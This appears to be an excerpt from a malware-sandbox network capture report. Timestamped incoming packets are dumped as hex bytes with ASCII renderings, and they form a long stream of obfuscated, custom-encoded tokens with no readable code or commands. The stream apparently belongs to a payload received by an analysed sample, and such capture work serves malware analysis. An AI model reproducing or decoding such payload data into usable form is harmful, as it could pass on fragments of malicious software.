2021-10-29 18:50:00 UTC	41	IN	Data Raw: 4f 20 6d 58 20 71 71 70 20 71 20 4a 71 4f 20 71 4f 4d 20 71 71 4a 20 57 44 20 4d 57 20 4d 70 20 57 57 20 58 6d 20 71 71 44 20 58 4f 20 70 4f 20 71 4f 57 20 57 4f 20 6d 58 20 57 44 20 58 4d 20 70 57 20 71 71 57 20 71 71 45 20 71 4f 45 20 58 57 20 44 57 20 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4a 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 71 20 44 57 20 71 57 58 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 4a 57 71 20 57 71 20 6d 58 20 57 4a 20 71 4d 20 70 4d 20 4a 71 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 45 4d 20 57 71 20 57 6d 20 58 4a 20 58 45 20 44 20 71 4d 44 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 45 45 20 58 57 20 71 71 6d 20 71 71 57 20 45 4a 20 70 20 71 57 6d 20 6d 58 20 57 4f 20 44 4f 20 57 4d 20 4a 57 71 20 71 71 44 20 71 4f 4d 20 Data Ascii: O mX qqp q JqO qOM qqJ WD MW Mp WW Xm qqD XO pO qOW WO mX WD XM pW qqW qqE qOE XW DW D WO Wm Mm JM qJ qOX qqJ WJ Jq DW qWX Xm qqm qJE J JWq Wq mX WJ qM pM JqX qqE qOM qJJ Mp EM Wq Wm XJ XE D qMD qqJ WO WX Mp EE XW qqm qqW EJ p qWm mX WO DO WM JWq qqD qOM
2021-10-29 18:50:00 UTC	42	IN	Data Raw: 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 71 57 20 6d 4d 20 57 4f 20 57 6d 20 4a 4a 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 45 20 57 4f 20 6d 58 20 57 4f 20 57 45 20 58 6d 20 71 71 6d 20 71 71 44 20 71 71 58 20 44 6d 20 6d 4d 20 6d 58 20 58 4f 20 57 6d 20 58 6d 20 71 71 6d 20 58 57 20 71 4f 4d 20 71 71 4a 20 70 57 20 6d 45 20 6d 44 20 70 4f 20 44 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4a 20 71 4a 4a 20 57 44 20 57 4f 20 45 4f 20 71 4a 6d 20 45 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 57 44 20 57 6d 20 4a 44 20 71 57 6d 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 57 20 45 4f 20 57 4a 20 44 45 20 58 44 20 57 6d 20 58 6d 20 71 4a 4f 20 4d 70 20 71 4d 4a 20 71 71 4a 20 57 4f 20 57 58 20 4a 44 20 71 71 44 20 58 6d 20 71 71 6d 20 71 4a 45 Data Ascii: Xm qqm qqE qOM qqJ qqW mM WO Wm JJ qqW qqE qOM qqE WO mX WO WE Xm qqm qqD qqX Dm mM mX XO Wm Xm qqm XW qOM qqJ pW mE mD pO D qqm qqE qOp J qJJ WD WO EO qJm EW qqE qOM qJJ WD Wm JD qWm Xm qqm qJE DW EO WJ DE XD Wm Xm qJO Mp qMJ qqJ WO WX JD qqD Xm qqm qJE
2021-10-29 18:50:00 UTC	44	IN	Data Raw: 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 71 70 44 20 57 4f 20 57 6d 20 4d 6d 20 4d 4f 20 4a 4f 6d 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 6d 20 71 70 44 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 6d 57 20 71 4f 44 20 71 71 70 20 57 4f 20 57 4a 20 45 44 20 6d 4d 20 58 57 20 71 71 6d 20 71 71 70 20 4a 4a 20 4a 4f 70 20 57 4f 20 6d 58 20 57 44 20 45 4a 20 58 70 20 71 71 57 20 71 71 45 20 71 4f 57 20 71 6d 20 57 4a 20 6d 4d 20 57 4f 20 57 4f 20 71 4a 71 20 44 44 20 4d 4d 20 70 71 20 4a 4a 20 57 58 20 6d 58 20 44 44 20 70 6d 20 71 70 4a 20 71 4a 44 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 71 70 44 20 57 4f 20 57 6d 20 4d 6d 20 71 4f 71 20 4a 6d 58 20 4a 4a 6d 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 70 4a 20 44 44 20 71 4f 4a 20 4d 70 20 4a 4f 4d 20 71 71 Data Ascii: qqE qOM qqm JD qpD WO Wm Mm MO JOm qOM qqJ WD Jm qpD Wm Xm qJO JmW qOD qqp WO WJ ED mM XW qqm qqp JJ JOp WO mX WD EJ Xp qqW qqE qOW qm WJ mM WO WO qJq DD MM pq JJ WX mX DD pm qpJ qJD qqE qOM qqm JD qpD WO Wm Mm qOq JmX JJm qqJ WO mM Jp pJ DD qOJ Mp JOM qq
2021-10-29 18:50:00 UTC	45	IN	Data Raw: 58 20 6d 58 20 71 71 44 20 57 6d 20 45 4a 20 71 44 20 71 71 45 20 4d 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 58 44 20 4d 4f 20 71 45 71 20 71 4f 4d 20 71 71 4a 20 57 4a 20 4d 57 20 4d 20 57 6d 20 58 6d 20 71 71 44 20 58 4f 20 71 71 45 20 44 45 20 57 58 20 57 4f 20 6d 4d 20 57 4f 20 71 4a 6d 20 6d 70 20 71 71 45 20 71 4f 4d 20 71 71 58 20 6d 70 20 70 20 57 4a 20 44 4d 20 4a 57 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 71 4f 20 4a 6d 20 71 58 4a 20 6d 58 20 70 4f 20 71 58 70 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 71 20 71 6d 20 6d 58 20 57 4f 20 6d 58 20 71 71 70 20 71 4f 44 20 45 4f 20 71 4f 71 20 71 71 6d 20 6d 4d 20 57 4a 20 4a 44 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 57 20 71 71 44 20 44 45 20 57 4a 20 44 45 20 71 57 70 20 57 6d Data Ascii: X mX qqD Wm EJ qD qqE MM qqJ WO mX WO qED XD MO qEq qOM qqJ WJ MW M Wm Xm qqD XO qqE DE WX WO mM WO qJm mp qqE qOM qqX mp p WJ DM JWW qqm qqE qOp qO Jm qXJ mX pO qXp qqm qqE qOE pq qm mX WO mX qqp qOD EO qOq qqm mM WJ JD qOX Xm qqm qqW qqD DE WJ DE qWp Wm
2021-10-29 18:50:00 UTC	46	IN	Data Raw: 57 20 71 71 45 20 71 4f 45 20 58 58 20 71 58 4d 20 6d 58 20 57 4f 20 6d 58 20 57 4d 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4a 70 20 6d 4f 20 71 20 44 4a 20 58 44 20 71 71 70 20 71 71 70 20 44 4d 20 71 45 20 57 4f 20 6d 58 20 57 4a 20 6d 45 20 71 4f 70 20 71 71 44 20 44 20 71 4d 58 20 71 71 4a 20 57 4f 20 57 58 20 45 4a 20 4a 58 20 4a 6d 4a 20 71 71 70 20 4a 44 20 57 44 20 71 71 70 20 57 4f 20 57 6d 20 70 4f 20 4a 4a 20 58 44 20 4d 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 4d 57 20 71 71 20 57 6d 20 58 6d 20 71 71 44 20 58 4f 20 71 71 45 20 44 45 20 57 58 20 57 4f 20 6d 4d 20 57 4f 20 71 4a 6d 20 71 44 20 71 71 45 20 71 4f 4d 20 71 71 58 20 6d 70 20 70 20 57 4a 20 44 4d 20 4a 57 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 71 4f 20 4a 6d 20 Data Ascii: W qqE qOE XX qXM mX WO mX WM mX qqE qOM qqX Jp mO q DJ XD qqp qqp DM qE WO mX WJ mE qOp qqD D qMX qqJ WO WX EJ JX JmJ qqp JD WD qqp WO Wm pO JJ XD MO qJm qOM qqJ WJ MW qq Wm Xm qqD XO qqE DE WX WO mM WO qJm qD qqE qOM qqX mp p WJ DM JWW qqm qqE qOp qO Jm
2021-10-29 18:50:00 UTC	48	IN	Data Raw: 20 71 4f 4d 20 71 71 58 20 57 44 20 6d 45 20 44 71 20 71 58 45 20 4d 4f 20 71 71 6d 20 71 71 45 20 71 71 71 20 58 57 20 70 44 20 70 44 20 4a 4f 6d 20 6d 58 20 70 58 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 4d 58 20 71 4a 71 20 71 6d 4a 20 57 4a 20 44 45 20 57 4f 20 57 6d 20 58 4a 20 71 20 4a 6d 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 44 20 44 6d 20 71 6d 4f 20 71 71 57 20 4a 57 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 70 20 70 44 20 4a 4f 6d 20 6d 58 20 70 70 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 71 71 71 20 71 4a 71 20 71 6d 4a 20 57 Data Ascii: qOM qqX WD mE Dq qXE MO qqm qqE qqq XW pD pD JOm mX pX qqm qqE qOE p qEM mX WO mX JmD XE MX qJq qmJ WJ DE WO Wm XJ q Jmm qOM qqJ WJ qmD Jp mD Dm qmO qqW JW qqJ WO Wm DW qXp Xm qqm qqW JOE XW mp pD JOm mX pp qqm qqE qOE p qEM mX WO mX JmD XE qqq qJq qmJ W
2021-10-29 18:50:00 UTC	49	IN	Data Raw: 20 57 70 20 57 4f 20 57 4f 20 6d 58 20 70 4d 20 4a 71 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 70 4a 20 57 4f 20 57 6d 20 71 4a 45 20 4d 4f 20 71 4f 4f 20 71 4f 4d 20 71 71 4a 20 4a 57 20 4a 6d 20 71 58 44 20 57 6d 20 58 6d 20 71 71 44 20 4d 57 20 45 57 20 71 71 57 20 57 6d 20 57 70 20 4a 44 20 4d 57 20 58 6d 20 71 71 6d 20 71 71 57 20 45 71 20 71 71 4a 20 57 4f 20 6d 70 20 4a 20 57 4f 20 58 6d 20 58 45 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 57 20 6d 58 20 57 4f 20 70 4d 20 58 4f 20 71 20 4a 6d 4d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 71 20 44 57 20 71 6d 57 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 70 71 20 57 71 20 6d 58 20 57 4a 20 71 4d 20 70 4d 20 71 4f 45 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 45 71 20 57 71 20 57 6d 20 58 4a Data Ascii: Wp WO WO mX pM JqW qqE qOM qJJ JD pJ WO Wm qJE MO qOO qOM qqJ JW Jm qXD Wm Xm qqD MW EW qqW Wm Wp JD MW Xm qqm qqW Eq qqJ WO mp J WO Xm XE qqD qOM qqJ mW mX WO pM XO q JmM qOX qqJ WJ Jq DW qmW Xm qqm qJE J pq Wq mX WJ qM pM qOE qqE qOM qJJ Mp Eq Wq Wm XJ
2021-10-29 18:50:00 UTC	50	IN	Data Raw: 57 6d 20 45 70 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 6d 58 20 57 4f 20 71 58 20 58 6d 20 71 71 6d 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 6d 20 71 4f 58 20 71 71 4a 20 57 4f 20 6d 44 20 57 71 20 57 6d 20 58 6d 20 71 71 4d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 44 71 20 6d 58 20 57 4f 20 57 57 20 45 4d 20 44 44 20 71 71 58 20 71 4f 4d 20 71 58 20 57 4f 20 6d 58 20 57 4f 20 4a 4a 20 58 6d 20 71 71 6d 20 71 4f 4f 20 71 71 6d 20 71 4f 58 20 4a 44 20 4d 58 20 57 4f 20 57 6d 20 4d 6d 20 4f 20 44 71 20 71 4f 71 20 71 71 4a 20 44 44 20 4a 6d 20 71 71 20 57 6d 20 58 6d 20 71 4a 4f 20 71 4a 45 20 71 4f 45 20 58 58 20 71 57 58 20 6d 58 20 57 4f 20 44 4f 20 71 4a 4f 20 44 58 20 71 71 Data Ascii: Wm Ep qqW qqE qOM qqp WO mX WO qX Xm qqm qqD qOM qqJ WO mX WO Wm Xm qqm qOm qOX qqJ WO mD Wq Wm Xm qqM qqE qOM qqJ Dq mX WO WW EM DD qqX qOM qX WO mX WO JJ Xm qqm qOO qqm qOX JD MX WO Wm Mm O Dq qOq qqJ DD Jm qq Wm Xm qJO qJE qOE XX qWX mX WO DO qJO DX qq
2021-10-29 18:50:00 UTC	52	IN	Data Raw: 20 57 4f 20 57 6d 20 58 57 20 4d 4f 20 4a 4f 57 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 4a 6d 20 44 70 20 57 6d 20 58 6d 20 71 71 4a 20 4d 70 20 4a 71 70 20 71 71 4a 20 57 4f 20 57 58 20 4a 44 20 71 6d 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 4d 20 4a 4f 4a 20 57 4f 20 6d 58 20 57 44 20 71 58 4a 20 4d 6d 20 71 71 57 20 71 71 45 20 71 4f 57 20 71 6d 20 57 44 20 6d 4d 20 57 4f 20 57 4f 20 6d 45 20 4a 4f 71 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 45 44 20 57 58 20 57 71 20 57 6d 20 58 4f 20 71 4a 20 71 4a 6d 20 71 4f 58 20 71 71 4a 20 57 6d 20 4a 4d 20 4a 20 70 4a 20 70 58 20 4a 4f 20 71 4a 57 20 71 4f 4d 20 4f 20 70 58 20 4a 4a 6d 20 44 70 20 57 6d 20 58 6d 20 71 71 4a 20 4d 70 20 4a 71 70 20 71 71 4a 20 57 4f 20 57 58 20 70 45 20 71 58 45 20 4a 71 45 20 71 Data Ascii: WO Wm XW MO JOW qOM qqJ WD JJm Dp Wm Xm qqJ Mp Jqp qqJ WO WX JD qmp Xm qqm qJE DM JOJ WO mX WD qXJ Mm qqW qqE qOW qm WD mM WO WO mE JOq qqE qOM qJJ ED WX Wq Wm XO qJ qJm qOX qqJ Wm JM J pJ pX JO qJW qOM O pX JJm Dp Wm Xm qqJ Mp Jqp qqJ WO WX pE qXE JqE q
2021-10-29 18:50:00 UTC	53	IN	Data Raw: 6d 20 71 4a 70 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 71 44 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 70 58 20 57 4f 20 57 6d 20 58 4a 20 4a 4d 20 71 6d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 44 20 71 71 44 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 71 71 20 57 4f 20 57 6d 20 58 4a 20 4a 4d 20 6d 20 71 4f 58 20 71 71 4a 20 57 4a 20 4a 44 20 44 58 20 57 4f 20 71 4a 6d 20 4a 4f 44 20 71 71 44 20 71 4f 4d 20 71 71 58 20 4a 44 20 4a 4f 4d 20 57 4f 20 57 6d 20 58 4a 20 58 45 20 58 58 20 71 4f 57 20 58 44 20 70 58 20 4a 45 20 57 57 20 70 4f 20 45 4f 20 71 71 6d 20 71 71 45 20 45 4f 20 70 71 20 4d 57 20 6d 4d 20 57 4f 20 6d 58 20 71 4a 44 20 57 4a 20 71 71 70 20 44 4d 20 Data Ascii: m qJp qOM qqJ WO mX qqD WO qJm JOD qqD qOM qqX JD JpX WO Wm XJ JM qm qOX qqJ WJ JD qqD WO qJm JOD qqD qOM qqX JD Jqq WO Wm XJ JM m qOX qqJ WJ JD DX WO qJm JOD qqD qOM qqX JD JOM WO Wm XJ XE XX qOW XD pX JE WW pO EO qqm qqE EO pq MW mM WO mX qJD WJ qqp DM
2021-10-29 18:50:00 UTC	57	IN	Data Raw: 44 20 71 70 58 20 71 71 6d 20 71 4f 4f 20 71 4f 44 20 71 4f 70 20 71 4f 44 20 70 57 20 57 70 20 70 4d 20 58 70 20 4d 4d 20 71 71 57 20 4a 4a 45 20 4a 57 20 4f 20 71 6d 44 20 4a 70 44 20 57 70 20 71 71 6d 20 71 45 4a 20 71 71 45 20 71 4a 6d 20 71 71 44 20 4d 70 20 44 4f 20 57 4f 20 57 6d 20 4d 6d 20 45 4a 20 6d 71 20 71 6d 44 20 71 6d 70 20 4a 4f 57 20 4a 70 58 20 44 4a 20 70 4d 20 58 4f 20 4d 6d 20 71 71 6d 20 71 4a 6d 20 71 71 44 20 4d 70 20 57 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 45 6d 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 58 20 70 70 20 71 4a 20 71 4a 44 20 71 4a 57 20 71 4f 44 20 4a 57 6d 20 4d 71 20 71 57 20 4a 4f 20 4a 4f 71 20 71 45 71 20 71 6d 71 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 57 Data Ascii: D qpX qqm qOO qOD qOp qOD pW Wp pM Xp MM qqW JJE JW O qmD JpD Wp qqm qEJ qqE qJm qqD Mp DO WO Wm Mm EJ mq qmD qmp JOW JpX DJ pM XO Mm qqm qJm qqD Mp WM WO Wm Mm qEm qEq qqO XD JpD mX WX pp qJ qJD qJW qOD JWm Mq qW JO JOq qEq qmq qEq qqO XD JpD mX WJ JX XW
2021-10-29 18:50:00 UTC	61	IN	Data Raw: 20 4a 4a 6d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4a 70 20 4a 44 20 71 4a 20 71 58 4a 20 57 4f 20 57 6d 20 58 6d 20 4d 4d 20 71 4f 4f 20 4a 20 71 44 44 20 57 4f 20 6d 58 20 57 44 20 70 4d 20 4d 4a 20 44 44 20 71 6d 20 71 4f 44 20 58 4f 20 57 4f 20 6d 58 20 71 58 20 57 70 20 44 4a 20 4d 70 20 45 20 71 4a 6d 20 4d 45 20 4d 70 20 71 4d 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 58 71 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 4d 20 71 4d 71 20 71 71 4f 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 4f 4a 20 6d 4a 20 71 58 4d 20 71 4f 6d 20 57 6d 20 58 6d 20 71 71 57 20 58 4f 20 71 4a 70 20 71 71 71 20 58 20 71 45 70 20 4a 70 20 70 70 20 45 57 20 6d 44 20 4a 70 4a 20 70 4f 20 45 4a 20 57 4f 20 6d 58 20 57 44 20 71 6d 58 20 44 45 20 4a 4d 20 57 4d 20 71 4f 4d 20 71 Data Ascii: JJm Xm qqm qJE qJp JD qJ qXJ WO Wm Xm MM qOO J qDD WO mX WD pM MJ DD qm qOD XO WO mX qX Wp DJ Mp E qJm ME Mp qM WO Wm Mm JM Xq qOM qqJ WD pM qMq qqO Xm qqm qqD EJ qOJ mJ qXM qOm Wm Xm qqW XO qJp qqq X qEp Jp pp EW mD JpJ pO EJ WO mX WD qmX DE JM WM qOM q
2021-10-29 18:50:00 UTC	65	IN	Data Raw: 20 71 4f 70 20 4a 71 4f 20 4a 44 20 4a 71 44 20 57 4f 20 57 6d 20 58 4a 20 4a 4d 20 71 44 58 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 57 20 4d 70 20 4a 4a 20 58 6d 20 71 71 6d 20 71 4a 45 20 4d 45 20 45 4a 20 71 45 57 20 6d 58 20 57 4f 20 57 6d 20 45 4f 20 71 71 4a 20 4d 70 20 45 44 20 71 71 4a 20 57 4f 20 57 58 20 44 70 20 44 70 20 70 4d 20 58 4f 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 71 4d 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 58 71 20 71 4f 4d 20 71 71 4a 20 57 44 20 6d 45 20 6d 4f 20 70 4f 20 44 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4a 20 71 45 4d 20 57 4f 20 57 4f 20 45 4f 20 71 4a 6d 20 58 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 45 44 20 6d 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4f 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 6d 45 20 6d Data Ascii: qOp JqO JD JqD WO Wm XJ JM qDX qOM qqJ WD WW Mp JJ Xm qqm qJE ME EJ qEW mX WO Wm EO qqJ Mp ED qqJ WO WX Dp Dp pM XO qqE qOM qJJ JD qM WO Wm Mm JM Xq qOM qqJ WD mE mO pO D qqm qqE qOp J qEM WO WO EO qJm XM qqE qOM qJJ ED mD WO Wm Mm JM qOD qOM qqJ WD mE m
2021-10-29 18:50:00 UTC	69	IN	Data Raw: 4d 70 20 57 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 45 6d 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 6d 20 71 71 6d 20 71 71 45 20 6d 6d 20 71 4a 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 58 6d 20 71 71 6d 20 4a 70 71 20 71 4f 58 20 71 71 4a 20 57 4f 20 71 57 44 20 57 4f 20 57 6d 20 58 6d 20 45 44 20 71 71 4d 20 71 4f 4d 20 71 71 4a 20 44 4a 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 70 70 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 6d 6d 20 71 71 70 20 57 4f 20 6d 58 20 71 4a 44 20 57 4a 20 58 6d 20 71 71 6d 20 71 71 58 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 58 20 57 4f 20 57 6d 20 58 57 20 71 71 4a 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 6d 58 20 6d 58 20 Data Ascii: Mp WM WO Wm Mm qEm qEq qqO XD JpD mX WJ JX Xm qqm qqE mm qJ WO mX mX Wm Xm qqm Jpq qOX qqJ WO qWD WO Wm Xm ED qqM qOM qqJ DJ mX WO Wm Xm qqm qqE qOM qqJ WO mX WO qpp Xm qqm qqE Jmm qqp WO mX qJD WJ Xm qqm qqX qOM qqJ WO WX WO Wm XW qqJ qqE qOM qqJ qmX mX
2021-10-29 18:50:00 UTC	73	IN	Data Raw: 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 45 20 70 20 71 4d 4d 20 6d 58 20 57 4f 20 6d 58 20 58 58 20 71 4a 4a 20 71 71 6d 20 4a 20 71 4a 58 20 57 4f 20 6d 58 20 57 4a 20 44 4a 20 45 57 20 71 4a 70 20 4a 6d 58 20 57 57 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 4a 70 4f 20 4a 6d 70 20 71 71 6d 20 71 71 45 20 71 4f 57 20 58 58 20 57 20 6d 58 20 57 4f 20 44 4f 20 70 4d 20 45 6d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 6d 20 71 57 20 6d 58 20 57 6d 20 70 44 20 71 4a 20 71 4f 45 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 6d 20 6d 57 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 57 4d 20 71 71 4a 20 57 4f 20 57 6d 20 57 58 20 70 4a 20 57 4d 20 71 70 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 57 58 20 4d 57 20 4a 70 45 20 57 6d 20 58 6d 20 71 4a 4f 20 71 45 71 20 Data Ascii: p Xm qqm qJE qOE p qMM mX WO mX XX qJJ qqm J qJX WO mX WJ DJ EW qJp JmX WW qqJ WO mM Jp JpO Jmp qqm qqE qOW XX W mX WO DO pM Em qqE qOM qJJ Dm qW mX Wm pD qJ qOE qOM qqJ WD Jm mW Wm Xm qJO JD qWM qqJ WO Wm WX pJ WM qpm qqE qOM qqX WX MW JpE Wm Xm qJO qEq
2021-10-29 18:50:00 UTC	77	IN	Data Raw: 4f 20 57 6d 20 58 4f 20 4a 57 4a 20 4a 58 20 45 71 20 71 71 4a 20 57 4f 20 6d 70 20 4a 20 6d 4d 20 58 6d 20 4f 20 71 71 70 20 71 4f 4d 20 71 71 4a 20 45 20 6d 58 20 57 4f 20 70 4d 20 58 44 20 4d 20 71 4f 71 20 71 4f 4d 20 71 71 4a 20 57 6d 20 57 71 20 71 58 6d 20 71 44 45 20 45 57 20 71 4a 45 20 57 70 20 71 58 45 20 71 71 57 20 57 4f 20 6d 58 20 6d 58 20 57 70 20 44 71 20 71 4f 45 20 6d 57 20 71 71 45 20 58 58 20 71 4a 58 20 6d 58 20 57 4f 20 6d 58 20 44 45 20 4a 6d 20 6d 6d 20 4f 20 71 4a 4a 20 70 44 20 57 4d 20 6d 58 20 45 45 20 44 6d 20 71 71 6d 20 71 71 45 20 71 4f 57 20 4d 4a 20 71 44 20 57 4f 20 45 70 20 70 6d 20 58 6d 20 71 71 6d 20 71 71 70 20 4a 4a 45 20 4a 57 20 57 45 20 57 4f 20 45 58 20 70 6d 20 58 6d 20 71 71 6d 20 71 71 70 20 71 71 71 20 71 Data Ascii: O Wm XO JWJ JX Eq qqJ WO mp J mM Xm O qqp qOM qqJ E mX WO pM XD M qOq qOM qqJ Wm Wq qXm qDE EW qJE Wp qXE qqW WO mX mX Wp Dq qOE mW qqE XX qJX mX WO mX DE Jm mm O qJJ pD WM mX EE Dm qqm qqE qOW MJ qD WO Ep pm Xm qqm qqp JJE JW WE WO EX pm Xm qqm qqp qqq q
2021-10-29 18:50:00 UTC	82	IN	Data Raw: 70 4a 20 58 6d 20 71 71 6d 20 71 71 57 20 4f 20 4d 4d 20 57 57 20 57 71 20 6d 57 20 58 4a 20 44 4a 20 44 57 20 71 71 4f 20 71 71 71 20 71 71 6d 20 70 57 20 57 70 20 6d 4f 20 70 4f 20 4a 70 4f 20 71 71 6d 20 71 71 45 20 71 4f 45 20 71 4f 70 20 58 58 20 71 4f 57 20 6d 58 20 45 45 20 44 4d 20 71 71 6d 20 71 71 45 20 71 4f 57 20 6d 4a 20 4a 44 20 71 4a 58 20 57 4f 20 57 6d 20 58 4a 20 58 4d 20 71 4f 6d 20 71 71 71 20 71 71 6d 20 6d 4d 20 70 70 20 57 57 20 58 58 20 71 4a 20 4a 45 20 71 71 71 20 44 4d 20 71 4d 6d 20 57 4f 20 6d 58 20 57 4a 20 70 70 20 44 4a 20 6d 70 20 71 71 4d 20 4a 4a 20 4d 45 20 57 4f 20 6d 58 20 57 6d 20 71 4f 58 20 71 4a 6d 20 71 4d 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 70 57 20 57 4a 20 70 45 20 71 71 4f 20 45 71 20 71 71 58 20 71 4f Data Ascii: pJ Xm qqm qqW O MM WW Wq mW XJ DJ DW qqO qqq qqm pW Wp mO pO JpO qqm qqE qOE qOp XX qOW mX EE DM qqm qqE qOW mJ JD qJX WO Wm XJ XM qOm qqq qqm mM pp WW XX qJ JE qqq DM qMm WO mX WJ pp DJ mp qqM JJ ME WO mX Wm qOX qJm qMm qqE qOM qqX pW WJ pE qqO Eq qqX qO
2021-10-29 18:50:00 UTC	86	IN	Data Raw: 4a 20 57 4f 20 57 58 20 70 70 20 57 71 20 44 4d 20 71 71 4d 20 4d 4d 20 4d 4a 20 4d 44 20 57 70 20 70 70 20 57 6d 20 6d 4d 20 44 4d 20 71 71 58 20 4a 70 4d 20 71 4a 70 20 4d 45 20 57 57 20 4d 57 20 4a 4f 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 71 57 20 71 4f 44 20 4d 45 20 57 6d 20 71 45 4f 20 44 6d 20 57 4d 20 4d 57 20 71 71 6d 20 57 20 71 71 4d 20 70 71 20 71 4d 44 20 6d 58 20 57 4f 20 44 4f 20 71 4a 4f 20 71 71 4f 20 71 71 4d 20 71 45 20 4d 58 20 57 4f 20 6d 58 20 57 6d 20 70 4d 20 58 4f 20 71 4f 71 20 6d 57 20 44 4d 20 71 4f 4d 20 57 4f 20 6d 58 20 4a 57 20 57 4a 20 6d 45 20 4d 44 20 71 71 45 20 71 4f 4d 20 71 71 44 20 70 57 20 57 4a 20 57 70 20 70 4d 20 58 4f 20 4a 70 4a 20 4a 71 57 20 71 4a 6d 20 71 71 44 20 70 45 20 71 4f 6d 20 70 70 20 57 4f 20 44 Data Ascii: J WO WX pp Wq DM qqM MM MJ MD Wp pp Wm mM DM qqX JpM qJp ME WW MW JOO Wm Xm qJO JqW qOD ME Wm qEO Dm WM MW qqm W qqM pq qMD mX WO DO qJO qqO qqM qE MX WO mX Wm pM XO qOq mW DM qOM WO mX JW WJ mE MD qqE qOM qqD pW WJ Wp pM XO JpJ JqW qJm qqD pE qOm pp WO D
